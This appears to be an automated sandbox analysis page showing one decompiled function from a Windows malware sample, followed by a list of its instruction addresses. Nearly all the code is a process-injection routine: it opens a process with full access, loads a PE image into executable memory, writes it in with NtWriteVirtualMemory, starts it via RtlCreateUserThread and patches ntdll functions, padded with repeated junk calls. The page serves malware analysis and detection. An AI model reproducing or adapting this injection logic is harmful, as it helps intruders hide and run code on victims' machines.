String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
API String ID: 667068680-597814768
Opcode ID: 25f160c79bc923fad7689f5ca45eb56f301796ba377db33cc6cd5c0bde8efdb6
Instruction ID: 2815d65a75cf095fdc645909efb88d26f78096c6d481c6bdd807526a8d7f1663
Opcode Fuzzy Hash: 25f160c79bc923fad7689f5ca45eb56f301796ba377db33cc6cd5c0bde8efdb6
Instruction Fuzzy Hash: A5314EBC9406749FFF00EFA4E989E3677EDE705A04B880A65B411CF249E7789815CF92

Uniqueness

Uniqueness Score: -1.00%

Function 02868328 Relevance: 57.4, APIs: 19, Strings: 13, Instructions: 1372
librarynativeloaderCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E02868328(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				char _v5;
				void* _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				char _v32;
				intOrPtr _v36;
				char _v40;
				char _v44;
				char _v48;
				intOrPtr _v52;
				char _v56;
				char _v60;
				char _v64;
				intOrPtr _v68;
				char _v72;
				char _v76;
				char _v80;
				intOrPtr _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v108;
				char _v112;
				intOrPtr _v116;
				char _v120;
				char _v124;
				char _v128;
				intOrPtr _v132;
				char _v136;
				char _v140;
				char _v144;
				intOrPtr _v148;
				char _v152;
				char _v156;
				char _v160;
				intOrPtr _v164;
				char _v168;
				char _v172;
				char _v176;
				intOrPtr _v180;
				char _v184;
				char _v188;
				char _v192;
				intOrPtr _v196;
				char _v200;
				char _v204;
				char _v208;
				intOrPtr _v212;
				char _v216;
				char _v220;
				char _v224;
				intOrPtr _v228;
				char _v232;
				char _v236;
				char _v240;
				intOrPtr _v244;
				char _v248;
				char _v252;
				char _v256;
				intOrPtr _v260;
				char _v264;
				char _v268;
				char _v272;
				intOrPtr _v276;
				char _v280;
				char _v284;
				char _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				intOrPtr _v308;
				char _v312;
				char _v316;
				char _v320;
				intOrPtr _v324;
				char _v328;
				char _v332;
				char _v336;
				intOrPtr _v340;
				char _v344;
				char _v348;
				char _v352;
				intOrPtr _v356;
				char _v360;
				char _v364;
				char _v368;
				intOrPtr _v372;
				char _v376;
				char _v380;
				char _v384;
				intOrPtr _v388;
				char _v392;
				char _v396;
				char _v400;
				intOrPtr _v404;
				char _v408;
				char _v412;
				char _v416;
				intOrPtr _v420;
				char _v424;
				char _v428;
				char _v432;
				intOrPtr _v436;
				char _v440;
				char _v444;
				char _v448;
				intOrPtr _v452;
				char _v456;
				char _v460;
				char _v464;
				intOrPtr _v468;
				char _v472;
				char _v476;
				char _v480;
				intOrPtr _v484;
				char _v488;
				char _v492;
				char _v496;
				intOrPtr _v500;
				char _v504;
				char _v508;
				char _v512;
				intOrPtr _v516;
				char _v520;
				char _v524;
				char _v528;
				intOrPtr _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr _v548;
				char _v552;
				char _v556;
				char _v560;
				intOrPtr _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v584;
				char _v588;
				char _v592;
				intOrPtr _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				intOrPtr _v628;
				char _v632;
				char _v636;
				char _v640;
				intOrPtr _v644;
				char _v648;
				char _v652;
				char _v656;
				intOrPtr _v660;
				char _v664;
				char _v668;
				char _v672;
				intOrPtr _v676;
				char _v680;
				char _v684;
				char _v688;
				intOrPtr _v692;
				char _v696;
				char _v700;
				intOrPtr _t478;
				intOrPtr* _t480;
				intOrPtr _t481;
				intOrPtr _t484;
				intOrPtr _t485;
				void* _t557;
				void* _t565;
				void* _t619;
				intOrPtr _t630;
				void* _t631;
				intOrPtr _t633;
				intOrPtr _t678;
				void* _t679;
				intOrPtr _t765;
				intOrPtr _t766;
				void* _t767;
				intOrPtr _t770;
				void* _t773;
				void* _t835;
				_Unknown_base(*)()* _t925;
				intOrPtr _t968;
				intOrPtr _t969;
				void* _t970;
				intOrPtr _t971;
				void* _t972;
				_Unknown_base(*)()** _t973;
				_Unknown_base(*)()* _t991;
				intOrPtr _t1050;
				intOrPtr _t1051;
				void* _t1052;
				_Unknown_base(*)()** _t1053;
				void* _t1056;
				void* _t1058;
				void* _t1060;
				void* _t1076;
				void* _t1079;
				intOrPtr _t1083;
				intOrPtr _t1085;
				intOrPtr _t1088;
				intOrPtr _t1091;
				void* _t1095;
				void* _t1151;
				void* _t1156;
				void* _t1161;
				void* _t1166;
				void* _t1171;
				void* _t1176;
				void* _t1181;
				void* _t1189;
				void* _t1194;
				void* _t1199;
				void* _t1204;
				void* _t1209;
				intOrPtr _t1210;
				void* _t1218;
				void* _t1223;
				void* _t1228;
				void* _t1236;
				void* _t1241;
				void* _t1246;
				void* _t1251;
				void* _t1256;
				void* _t1261;
				void* _t1266;
				void* _t1271;
				void* _t1276;
				signed short _t1277;
				void* _t1286;
				void* _t1291;
				void* _t1296;
				void* _t1301;
				void* _t1306;
				void* _t1311;
				void* _t1316;
				void* _t1321;
				void* _t1326;
				void* _t1331;
				_Unknown_base(*)()** _t1332;
				void* _t1337;
				void* _t1342;
				void* _t1347;
				void* _t1352;
				_Unknown_base(*)()** _t1353;
				void* _t1358;
				void* _t1363;
				void* _t1368;
				void* _t1373;
				void* _t1381;
				intOrPtr _t1384;
				void* _t1387;
				void* _t1389;
				void* _t1390;
				intOrPtr* _t1392;
				intOrPtr _t1394;
				intOrPtr _t1395;

				_t1394 = _t1395;
				_t1095 = 0x57;
				do {
					_push(0);
					_push(0);
					_t1095 = _t1095 - 1;
				} while (_t1095 != 0);
				_t1392 = _a4;
				_push(_t1394);
				_push(0x2869992);
				_push( *[fs:eax]);
				 *[fs:eax] = _t1395;
				E028544F4(0x28a63cc, 0x28699b0);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("OpenSession");
				E02854824();
				E02854698( &_v16, E02854964(_v20));
				_push(_v16);
				E028547B0( &_v28,  *0x28a63cc, 0x28699bc);
				E02854698( &_v24, E02854964(_v28));
				_pop(_t1151);
				E02867B80(_v24, _t1151);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("ScanString");
				E02854824();
				E02854698( &_v32, E02854964(_v36));
				_push(_v32);
				E028547B0( &_v44,  *0x28a63cc, 0x28699bc);
				E02854698( &_v40, E02854964(_v44));
				_pop(_t1156);
				E02867B80(_v40, _t1156);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("Initialize");
				E02854824();
				E02854698( &_v48, E02854964(_v52));
				_push(_v48);
				E028547B0( &_v60,  *0x28a63cc, 0x28699bc);
				E02854698( &_v56, E02854964(_v60));
				_pop(_t1161);
				E02867B80(_v56, _t1161);
				_v5 = 0;
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("UacInitialize");
				E02854824();
				E02854698( &_v64, E02854964(_v68));
				_push(_v64);
				E028547B0( &_v76,  *0x28a63cc, 0x28699bc);
				E02854698( &_v72, E02854964(_v76));
				_pop(_t1166);
				E02867B80(_v72, _t1166);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("ScanString");
				E02854824();
				E02854698( &_v80, E02854964(_v84));
				_push(_v80);
				E028547B0( &_v92,  *0x28a63cc, 0x28699bc);
				E02854698( &_v88, E02854964(_v92));
				_pop(_t1171);
				E02867B80(_v88, _t1171);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("UacInitialize");
				E02854824();
				E02854698( &_v96, E02854964(_v100));
				_push(_v96);
				E028547B0( &_v108,  *0x28a63cc, 0x28699bc);
				E02854698( &_v104, E02854964(_v108));
				_pop(_t1176);
				E02867B80(_v104, _t1176);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("ScanBuffer");
				E02854824();
				E02854698( &_v112, E02854964(_v116));
				_push(_v112);
				E028547B0( &_v124,  *0x28a63cc, 0x28699bc);
				E02854698( &_v120, E02854964(_v124));
				_pop(_t1181);
				E02867B80(_v120, _t1181);
				_t478 =  *0x28a2c1c; // 0x28a6324
				E02867AF4(_t478, 0, 0, 0, 0);
				_t480 =  *0x28a2df0; // 0x28a633c
				 *_t480 = _a8;
				_t481 =  *0x28a2df0; // 0x28a633c
				 *((intOrPtr*)(_t481 + 4)) = 0;
				 *0x28a6398 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtOpenProcess");
				_t484 =  *0x28a2df0; // 0x28a633c
				_t485 =  *0x28a2c1c; // 0x28a6324
				 *0x28a6398(0x28a63c4, 0x1f0fff, _t485, _t484);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("Initialize");
				E02854824();
				E02854698( &_v128, E02854964(_v132));
				_push(_v128);
				E028547B0( &_v140,  *0x28a63cc, 0x28699bc);
				E02854698( &_v136, E02854964(_v140));
				_pop(_t1189);
				E02867B80(_v136, _t1189);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("ScanString");
				E02854824();
				E02854698( &_v144, E02854964(_v148));
				_push(_v144);
				E028547B0( &_v156,  *0x28a63cc, 0x28699bc);
				E02854698( &_v152, E02854964(_v156));
				_pop(_t1194);
				E02867B80(_v152, _t1194);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("OpenSession");
				E02854824();
				E02854698( &_v160, E02854964(_v164));
				_push(_v160);
				E028547B0( &_v172,  *0x28a63cc, 0x28699bc);
				E02854698( &_v168, E02854964(_v172));
				_pop(_t1199);
				E02867B80(_v168, _t1199);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("Initialize");
				E02854824();
				E02854698( &_v176, E02854964(_v180));
				_push(_v176);
				E028547B0( &_v188,  *0x28a63cc, 0x28699bc);
				E02854698( &_v184, E02854964(_v188));
				_pop(_t1204);
				E02867B80(_v184, _t1204);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("ScanString");
				E02854824();
				E02854698( &_v192, E02854964(_v196));
				_push(_v192);
				E028547B0( &_v204,  *0x28a63cc, 0x28699bc);
				E02854698( &_v200, E02854964(_v204));
				_pop(_t1209);
				E02867B80(_v200, _t1209);
				if( *0x28a63c4 == 0) {
					L21:
					_t557 =  *0x28a63c4; // 0x0
					CloseHandle(_t557);
					_pop(_t1210);
					 *[fs:eax] = _t1210;
					_push(0x2869999);
					E028544C4( &_v700, 0x64);
					return E028544C4( &_v300, 0x48);
				}
				_t565 =  *((intOrPtr*)( *_t1392))();
				 *0x28a63b8 = E028679CC(GetCurrentProcess(), 0, _t565, 0x3000, 0x40);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("ScanBuffer");
				E02854824();
				E02854698( &_v208, E02854964(_v212));
				_push(_v208);
				E028547B0( &_v220,  *0x28a63cc, 0x28699bc);
				E02854698( &_v216, E02854964(_v220));
				_pop(_t1218);
				E02867B80(_v216, _t1218);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("UacInitialize");
				E02854824();
				E02854698( &_v224, E02854964(_v228));
				_push(_v224);
				E028547B0( &_v236,  *0x28a63cc, 0x28699bc);
				E02854698( &_v232, E02854964(_v236));
				_pop(_t1223);
				E02867B80(_v232, _t1223);
				_push(0x28699bc);
				_push( *0x28a63cc);
				_push("OpenSession");
				E02854824();
				E02854698( &_v240, E02854964(_v244));
				_push(_v240);
				E028547B0( &_v252,  *0x28a63cc, 0x28699bc);
				E02854698( &_v248, E02854964(_v252));
				_pop(_t1228);
				E02867B80(_v248, _t1228);
				if( *0x28a63b8 == 0) {
					goto L21;
				}
				E028658D8(_t1392, 0, 0);
				 *((intOrPtr*)( *_t1392))();
				 *((intOrPtr*)( *_t1392 + 0xc))();
				_t1387 =  *0x28a63b8; // 0x0
				if(IsBadReadPtr(_t1387, 0x40) != 0 ||  *_t1387 != 0x5a4d) {
					L20:
					_push( *((intOrPtr*)( *_t1392))(0x4000));
					_t619 =  *0x28a63b8; // 0x0
					_push(_t619);
					_push(GetCurrentProcess());
					L028679C4();
					goto L21;
				} else {
					_v12 =  *((intOrPtr*)(_t1387 + 0x3c)) +  *0x28a63b8;
					if(IsBadReadPtr(_v12, 0xf8) != 0 ||  *_v12 != 0x4550) {
						goto L20;
					} else {
						 *0x28a63ac = _v12 + 0xf8;
						 *0x28a63b4 =  *((intOrPtr*)(_v12 + 0x50));
						if( *0x28a63b4 == 0) {
							L19:
							_push(0x4000);
							_t630 =  *0x28a63b4; // 0x0
							_push(_t630);
							_t631 =  *0x28a63bc; // 0x0
							_push(_t631);
							_push(GetCurrentProcess());
							L028679C4();
							goto L20;
						}
						_t633 =  *0x28a63b4; // 0x0
						 *0x28a63bc = E028679CC(GetCurrentProcess(), 0, _t633, 0x3000, 0x40);
						_push(0x28699bc);
						_push( *0x28a63cc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v256, E02854964(_v260));
						_push(_v256);
						E028547B0( &_v268,  *0x28a63cc, 0x28699bc);
						E02854698( &_v264, E02854964(_v268));
						_pop(_t1236);
						E02867B80(_v264, _t1236);
						_push(0x28699bc);
						_push( *0x28a63cc);
						_push("UacInitialize");
						E02854824();
						E02854698( &_v272, E02854964(_v276));
						_push(_v272);
						E028547B0( &_v284,  *0x28a63cc, 0x28699bc);
						E02854698( &_v280, E02854964(_v284));
						_pop(_t1241);
						E02867B80(_v280, _t1241);
						_push(0x28699bc);
						_push( *0x28a63cc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v288, E02854964(_v292));
						_push(_v288);
						E028547B0( &_v300,  *0x28a63cc, 0x28699bc);
						E02854698( &_v296, E02854964(_v300));
						_pop(_t1246);
						E02867B80(_v296, _t1246);
						if( *0x28a63bc == 0) {
							goto L19;
						}
						_t678 =  *0x28a63b4; // 0x0
						_t679 =  *0x28a63c4; // 0x0
						 *0x28a63c0 = E028679CC(_t679, 0, _t678, 0x3000, 0x40);
						_push(0x28699bc);
						_push( *0x28a63cc);
						_push("ScanBuffer");
						E02854824();
						E02854698( &_v304, E02854964(_v308));
						_push(_v304);
						E028547B0( &_v316,  *0x28a63cc, 0x28699bc);
						E02854698( &_v312, E02854964(_v316));
						_pop(_t1251);
						E02867B80(_v312, _t1251);
						_push(0x28699bc);
						_push( *0x28a63cc);
						_push("UacInitialize");
						E02854824();
						E02854698( &_v320, E02854964(_v324));
						_push(_v320);
						E028547B0( &_v332,  *0x28a63cc, 0x28699bc);
						E02854698( &_v328, E02854964(_v332));
						_pop(_t1256);
						E02867B80(_v328, _t1256);
						_push(0x28699bc);
						_push( *0x28a63cc);
						_push("OpenSession");
						E02854824();
						E02854698( &_v336, E02854964(_v340));
						_push(_v336);
						E028547B0( &_v348,  *0x28a63cc, 0x28699bc);
						E02854698( &_v344, E02854964(_v348));
						_pop(_t1261);
						E02867B80(_v344, _t1261);
						if( *0x28a63c0 == 0) {
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("UacInitialize");
							E02854824();
							E02854698( &_v656, E02854964(_v660));
							_push(_v656);
							E028547B0( &_v668,  *0x28a63cc, 0x28699bc);
							E02854698( &_v664, E02854964(_v668));
							_pop(_t1266);
							E02867B80(_v664, _t1266);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("ScanString");
							E02854824();
							E02854698( &_v672, E02854964(_v676));
							_push(_v672);
							E028547B0( &_v684,  *0x28a63cc, 0x28699bc);
							E02854698( &_v680, E02854964(_v684));
							_pop(_t1271);
							E02867B80(_v680, _t1271);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v688, E02854964(_v692));
							_push(_v688);
							E028547B0( &_v700,  *0x28a63cc, 0x28699bc);
							E02854698( &_v696, E02854964(_v700));
							_pop(_t1276);
							E02867B80(_v696, _t1276);
							_push(0x4000);
							_t765 =  *0x28a63b4; // 0x0
							_push(_t765);
							_t766 =  *0x28a63c0; // 0x0
							_push(_t766);
							_t767 =  *0x28a63c4; // 0x0
							_push(_t767);
							L028679C4();
							goto L19;
						}
						 *0x28a63b0 =  *(_v12 + 6) & 0x0000ffff;
						_t770 =  *0x28a63ac; // 0x0
						_t1277 =  *0x28a63b0; // 0x0
						_t773 =  *0x28a63bc; // 0x0
						RtlMoveMemory(_t773, _t1387, _t770 - _t1387 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + (_t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277 + _t1277) * 4);
						_t1389 = ( *0x28a63b0 & 0x0000ffff) - 1;
						if(_t1389 < 0) {
							L14:
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("UacScan");
							E02854824();
							E02854698( &_v352, E02854964(_v356));
							_push(_v352);
							E028547B0( &_v364,  *0x28a63cc, 0x28699bc);
							E02854698( &_v360, E02854964(_v364));
							_pop(_t1286);
							E02867B80(_v360, _t1286);
							_t789 =  *((intOrPtr*)(_v12 + 0xa0));
							if( *((intOrPtr*)(_v12 + 0xa0)) != 0) {
								_t1384 =  *0x28a63c0; // 0x0
								_t1079 =  *0x28a63bc; // 0x0
								E02868110( *((intOrPtr*)(_v12 + 0x34)), _t1079, _t789 +  *0x28a63bc, _t1384,  *((intOrPtr*)(_v12 + 0xa4)));
							}
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("ScanBuffer");
							E02854824();
							E02854698( &_v368, E02854964(_v372));
							_push(_v368);
							E028547B0( &_v380,  *0x28a63cc, 0x28699bc);
							E02854698( &_v376, E02854964(_v380));
							_pop(_t1291);
							E02867B80(_v376, _t1291);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("UacInitialize");
							E02854824();
							E02854698( &_v384, E02854964(_v388));
							_push(_v384);
							E028547B0( &_v396,  *0x28a63cc, 0x28699bc);
							E02854698( &_v392, E02854964(_v396));
							_pop(_t1296);
							E02867B80(_v392, _t1296);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v400, E02854964(_v404));
							_push(_v400);
							E028547B0( &_v412,  *0x28a63cc, 0x28699bc);
							E02854698( &_v408, E02854964(_v412));
							_pop(_t1301);
							E02867B80(_v408, _t1301);
							_t835 =  *0x28a63bc; // 0x0
							E028681C0(_t835,  *((intOrPtr*)(_v12 + 0x80)) +  *0x28a63bc);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("ScanBuffer");
							E02854824();
							E02854698( &_v416, E02854964(_v420));
							_push(_v416);
							E028547B0( &_v428,  *0x28a63cc, 0x28699bc);
							E02854698( &_v424, E02854964(_v428));
							_pop(_t1306);
							E02867B80(_v424, _t1306);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("UacInitialize");
							E02854824();
							E02854698( &_v432, E02854964(_v436));
							_push(_v432);
							E028547B0( &_v444,  *0x28a63cc, 0x28699bc);
							E02854698( &_v440, E02854964(_v444));
							_pop(_t1311);
							E02867B80(_v440, _t1311);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v448, E02854964(_v452));
							_push(_v448);
							E028547B0( &_v460,  *0x28a63cc, 0x28699bc);
							E02854698( &_v456, E02854964(_v460));
							_pop(_t1316);
							E02867B80(_v456, _t1316);
							 *0x28a63a8 =  *((intOrPtr*)(_v12 + 0x28)) +  *0x28a63c0;
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("UacInitialize");
							E02854824();
							E02854698( &_v464, E02854964(_v468));
							_push(_v464);
							E028547B0( &_v476,  *0x28a63cc, 0x28699bc);
							E02854698( &_v472, E02854964(_v476));
							_pop(_t1321);
							E02867B80(_v472, _t1321);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("ScanBuffer");
							E02854824();
							E02854698( &_v480, E02854964(_v484));
							_push(_v480);
							E028547B0( &_v492,  *0x28a63cc, 0x28699bc);
							E02854698( &_v488, E02854964(_v492));
							_pop(_t1326);
							E02867B80(_v488, _t1326);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("ScanString");
							E02854824();
							E02854698( &_v496, E02854964(_v500));
							_push(_v496);
							E028547B0( &_v508,  *0x28a63cc, 0x28699bc);
							E02854698( &_v504, E02854964(_v508));
							_pop(_t1331);
							E02867B80(_v504, _t1331);
							_t925 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "NtWriteVirtualMemory");
							_t1332 =  *0x28a2d0c; // 0x28a6320
							 *_t1332 = _t925;
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("UacInitialize");
							E02854824();
							E02854698( &_v512, E02854964(_v516));
							_push(_v512);
							E028547B0( &_v524,  *0x28a63cc, 0x28699bc);
							E02854698( &_v520, E02854964(_v524));
							_pop(_t1337);
							E02867B80(_v520, _t1337);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v528, E02854964(_v532));
							_push(_v528);
							E028547B0( &_v540,  *0x28a63cc, 0x28699bc);
							E02854698( &_v536, E02854964(_v540));
							_pop(_t1342);
							E02867B80(_v536, _t1342);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("ScanBuffer");
							E02854824();
							E02854698( &_v544, E02854964(_v548));
							_push(_v544);
							E028547B0( &_v556,  *0x28a63cc, 0x28699bc);
							E02854698( &_v552, E02854964(_v556));
							_pop(_t1347);
							E02867B80(_v552, _t1347);
							_t968 =  *0x28a63c8; // 0x0
							_t969 =  *0x28a63b4; // 0x0
							_t970 =  *0x28a63bc; // 0x0
							_t971 =  *0x28a63c0; // 0x0
							_t972 =  *0x28a63c4; // 0x0
							_t973 =  *0x28a2d0c; // 0x28a6320
							 *( *_t973)(_t972, _t971, _t970, _t969, _t968);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("ScanBuffer");
							E02854824();
							E02854698( &_v560, E02854964(_v564));
							_push(_v560);
							E028547B0( &_v572,  *0x28a63cc, 0x28699bc);
							E02854698( &_v568, E02854964(_v572));
							_pop(_t1352);
							E02867B80(_v568, _t1352);
							_t991 = GetProcAddress(GetModuleHandleW(L"C:\\Windows\\System32\\ntdll.dll"), "RtlCreateUserThread");
							_t1353 =  *0x28a2c8c; // 0x28a6314
							 *_t1353 = _t991;
							 *0x28a63a0 = 0;
							 *0x28a63a4 = 0;
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("UacInitialize");
							E02854824();
							E02854698( &_v576, E02854964(_v580));
							_push(_v576);
							E028547B0( &_v588,  *0x28a63cc, 0x28699bc);
							E02854698( &_v584, E02854964(_v588));
							_pop(_t1358);
							E02867B80(_v584, _t1358);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("ScanString");
							E02854824();
							E02854698( &_v592, E02854964(_v596));
							_push(_v592);
							E028547B0( &_v604,  *0x28a63cc, 0x28699bc);
							E02854698( &_v600, E02854964(_v604));
							_pop(_t1363);
							E02867B80(_v600, _t1363);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("OpenSession");
							E02854824();
							E02854698( &_v608, E02854964(_v612));
							_push(_v608);
							E028547B0( &_v620,  *0x28a63cc, 0x28699bc);
							E02854698( &_v616, E02854964(_v620));
							_pop(_t1368);
							E02867B80(_v616, _t1368);
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("UacInitialize");
							E02854824();
							E02854698( &_v624, E02854964(_v628));
							_push(_v624);
							E028547B0( &_v636,  *0x28a63cc, 0x28699bc);
							E02854698( &_v632, E02854964(_v636));
							_pop(_t1373);
							E02867B80(_v632, _t1373);
							_t1050 =  *0x28a63a4; // 0x0
							_t1051 =  *0x28a63a8; // 0x0
							_t1052 =  *0x28a63c4; // 0x0
							_t1053 =  *0x28a2c8c; // 0x28a6314
							 *( *_t1053)(_t1052, 0, 0, 0, 0, 0, _t1051, 0, 0x28a63a0, _t1050);
							_t1056 =  *0x28a63c4; // 0x0
							E02867B24(_t1056, "NtOpenProcess");
							_t1058 =  *0x28a63c4; // 0x0
							E02867B24(_t1058, "NtReadVirtualMemory");
							_t1060 =  *0x28a63c4; // 0x0
							E02867B24(_t1060, "NtSetSecurityObject");
							_push(0x28699bc);
							_push( *0x28a63cc);
							_push("ScanBuffer");
							E02854824();
							E02854698( &_v640, E02854964(_v644));
							_push(_v640);
							E028547B0( &_v652,  *0x28a63cc, 0x28699bc);
							E02854698( &_v648, E02854964(_v652));
							_pop(_t1381);
							E02867B80(_v648, _t1381);
							if( *0x28a63a0 != 0) {
								_v5 = 1;
								_t1076 =  *0x28a63a0; // 0x0
								CloseHandle(_t1076);
							}
							goto L19;
						}
						_t1390 = _t1389 + 1;
						do {
							_t1083 =  *0x28a63ac; // 0x0
							_t1085 =  *0x28a63ac; // 0x0
							_t1088 =  *0x28a63ac; // 0x0
							RtlMoveMemory( *((intOrPtr*)(_t1088 + 0xc)) +  *0x28a63bc,  *((intOrPtr*)(_t1085 + 0x14)) +  *0x28a63b8,  *(_t1083 + 0x10));
							_t1091 =  *0x28a63ac; // 0x0
							 *0x28a63ac = _t1091 + 0x28;
							_t1390 = _t1390 - 1;
						} while (_t1390 != 0);
						goto L14;
					}
				}
			}

0x02868329
0x0286832b
0x02868330
0x02868330
0x02868332
0x02868334
0x02868334
0x0286833a
0x02868344
0x02868345
0x0286834a
0x0286834d
0x02868357
0x0286835c
0x02868361
0x02868363
0x02868370
0x02868382
0x0286838a
0x02868395
0x028683a7
0x028683af
0x028683b0
0x028683b5
0x028683ba
0x028683bc
0x028683c9
0x028683db
0x028683e3
0x028683ee
0x02868400
0x02868408
0x02868409
0x0286840e
0x02868413
0x02868415
0x02868422
0x02868434
0x0286843c
0x02868447
0x02868459
0x02868461
0x02868462
0x02868467
0x0286846b
0x02868470
0x02868472
0x0286847f
0x02868491
0x02868499
0x028684a4
0x028684b6
0x028684be
0x028684bf
0x028684c4
0x028684c9
0x028684cb
0x028684d8
0x028684ea
0x028684f2
0x028684fd
0x0286850f
0x02868517
0x02868518
0x0286851d
0x02868522
0x02868524
0x02868531
0x02868543
0x0286854b
0x02868556
0x02868568
0x02868570
0x02868571
0x02868576
0x0286857b
0x0286857d
0x0286858a
0x0286859c
0x028685a4
0x028685af
0x028685c1
0x028685c9
0x028685ca
0x028685d3
0x028685dc
0x028685e1
0x028685e9
0x028685eb
0x028685f2
0x0286860a
0x0286860f
0x02868615
0x02868625
0x0286862b
0x02868630
0x02868632
0x0286863f
0x02868651
0x02868659
0x02868667
0x0286867f
0x0286868a
0x0286868b
0x02868690
0x02868695
0x02868697
0x028686a7
0x028686bf
0x028686ca
0x028686d8
0x028686f0
0x028686fb
0x028686fc
0x02868701
0x02868706
0x02868708
0x02868718
0x02868730
0x0286873b
0x02868749
0x02868761
0x0286876c
0x0286876d
0x02868772
0x02868777
0x02868779
0x02868789
0x028687a1
0x028687ac
0x028687ba
0x028687d2
0x028687dd
0x028687de
0x028687e3
0x028687e8
0x028687ea
0x028687fa
0x02868812
0x0286881d
0x0286882b
0x02868843
0x0286884e
0x0286884f
0x0286885b
0x02869959
0x02869959
0x0286995f
0x02869966
0x02869969
0x0286996c
0x0286997c
0x02869991
0x02869991
0x0286886c
0x0286887c
0x02868881
0x02868886
0x02868888
0x02868898
0x028688b0
0x028688bb
0x028688c9
0x028688e1
0x028688ec
0x028688ed
0x028688f2
0x028688f7
0x028688f9
0x02868909
0x02868921
0x0286892c
0x0286893a
0x02868952
0x0286895d
0x0286895e
0x02868963
0x02868968
0x0286896a
0x0286897a
0x02868992
0x0286899d
0x028689ab
0x028689c3
0x028689ce
0x028689cf
0x028689db
0x00000000
0x00000000
0x028689e7
0x028689f0
0x028689fe
0x02868a01
0x02868a11
0x0286993c
0x02869947
0x02869948
0x0286994d
0x02869953
0x02869954
0x00000000
0x02868a22
0x02868a2b
0x02868a3e
0x00000000
0x02868a53
0x02868a5b
0x02868a66
0x02868a72
0x02869920
0x02869920
0x02869925
0x0286992a
0x0286992b
0x02869930
0x02869936
0x02869937
0x00000000
0x02869937
0x02868a7f
0x02868a92
0x02868a97
0x02868a9c
0x02868a9e
0x02868aae
0x02868ac6
0x02868ad1
0x02868adf
0x02868af7
0x02868b02
0x02868b03
0x02868b08
0x02868b0d
0x02868b0f
0x02868b1f
0x02868b37
0x02868b42
0x02868b50
0x02868b68
0x02868b73
0x02868b74
0x02868b79
0x02868b7e
0x02868b80
0x02868b90
0x02868ba8
0x02868bb3
0x02868bc1
0x02868bd9
0x02868be4
0x02868be5
0x02868bf1
0x00000000
0x00000000
0x02868bfe
0x02868c06
0x02868c11
0x02868c16
0x02868c1b
0x02868c1d
0x02868c2d
0x02868c45
0x02868c50
0x02868c5e
0x02868c76
0x02868c81
0x02868c82
0x02868c87
0x02868c8c
0x02868c8e
0x02868c9e
0x02868cb6
0x02868cc1
0x02868ccf
0x02868ce7
0x02868cf2
0x02868cf3
0x02868cf8
0x02868cfd
0x02868cff
0x02868d0f
0x02868d27
0x02868d32
0x02868d40
0x02868d58
0x02868d63
0x02868d64
0x02868d70
0x028697b1
0x028697b6
0x028697b8
0x028697c8
0x028697e0
0x028697eb
0x028697f9
0x02869811
0x0286981c
0x0286981d
0x02869822
0x02869827
0x02869829
0x02869839
0x02869851
0x0286985c
0x0286986a
0x02869882
0x0286988d
0x0286988e
0x02869893
0x02869898
0x0286989a
0x028698aa
0x028698c2
0x028698cd
0x028698db
0x028698f3
0x028698fe
0x028698ff
0x02869904
0x02869909
0x0286990e
0x0286990f
0x02869914
0x02869915
0x0286991a
0x0286991b
0x00000000
0x0286991b
0x02868d7d
